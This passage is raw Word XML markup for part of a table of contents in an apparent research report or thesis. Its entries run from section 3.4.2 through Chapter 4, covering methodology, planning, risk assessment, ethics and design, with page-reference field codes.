                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cross-Sectional Studies</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190726 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B214530" w14:textId="677E9693" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190727" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Project Planner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190727 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="766834C6" w14:textId="29225C7F" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190728" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Research Methodology</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190728 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16BD9754" w14:textId="7CC25907" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190729" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Resources and Planning</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190729 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02632DB0" w14:textId="6E39BCAE" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190730" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Design</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190730 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31DC66F2" w14:textId="1FFF7E76" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190731" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Data Collection and Analysis Methods</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190731 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F66199F" w14:textId="4DCA617E" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190732" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Assessment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190732 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3AF1D316" w14:textId="1D63AB73" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190733" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Contingency Plan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190733 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A3BC33D" w14:textId="29186746" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190734" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ethical Reflections</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190734 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11BDE99C" w14:textId="15951041" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190735" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Research Conclusion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190735 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DB7AF1C" w14:textId="13B194B4" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190736" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHAPTER 4: DESIGN AND IMPLEMENTATION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190736 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AC589CE" w14:textId="08B016B6" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190737" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190737 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17448C5D" w14:textId="1697044D" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190738" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Problem Formulation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190738 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BC98E2C" w14:textId="5DBAAF68" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
